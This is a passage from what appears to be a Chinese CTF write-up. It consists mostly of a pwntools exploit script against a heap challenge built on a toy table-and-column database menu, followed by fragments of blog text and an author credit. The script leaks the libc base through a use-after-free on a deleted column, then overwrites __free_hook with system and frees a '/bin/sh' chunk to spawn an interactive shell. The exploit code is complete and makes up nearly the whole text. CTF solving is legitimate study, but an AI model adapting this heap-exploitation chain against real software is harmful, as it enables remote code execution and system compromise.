    r.send(name)
    r.recvuntil('Column Content: ')
    r.send(content)
def delete_tab(tab_name):
    """Issue DELETE TABLE for *tab_name*."""
    menu(f'DELETE TABLE {tab_name}')
def delete_col(tab_name, col_name):
    """Delete column *col_name* from table *tab_name* (the write-up reports a
    use-after-free on this path)."""
    menu(f'DELETE {col_name} FROM {tab_name}')
def show_tab(tab_name):
    """Issue SHOW TABLE for *tab_name*; its output is what the leak reads."""
    menu(f'SHOW TABLE {tab_name}')
def pwnme():
    """Exploit flow from the write-up: leak libc through a dangling column,
    forge a column whose pointers target __free_hook, then free it."""
    for name in '0123':
        add_tab(name)
    for i in range(10):
        add_col('0', f'a{i}')
    delete_tab('0')
    add_tab('0')
    for i in range(7):
        add_col('0', f'a{6 - i}')
    add_col('1', 'b0')
    show_tab('1')
    leaked = r.recvuntil(b'\x7f')[-6:]
    libc_base = u64(leaked.ljust(8, b"\x00")) - 0x1ece50
    print('[+]libc_base:', hex(libc_base))
    free_hook = libc_base + libc.sym['__free_hook']
    system = libc_base + libc.sym['system']
    add_col('2', 'c0')
    add_col('2', 'c1')
    payload = b'a' * 0x70 + b'#'.ljust(0x10, b'\x00') + p64(free_hook) * 3
    edit('2', 'c0', '?' * 0x10, payload)
    edit('2', '#', '#', b'/bin/sh\x00' + p64(system))
    delete_col('2', '#')
    print('[+]free_hook:', hex(free_hook))
    print('[+]system:', hex(system))
    r.interactive()
pwnme()  # runs at import time, right after the process/ELF setup above
hp
待研究
mysh
0解题
作者:寒江寻影
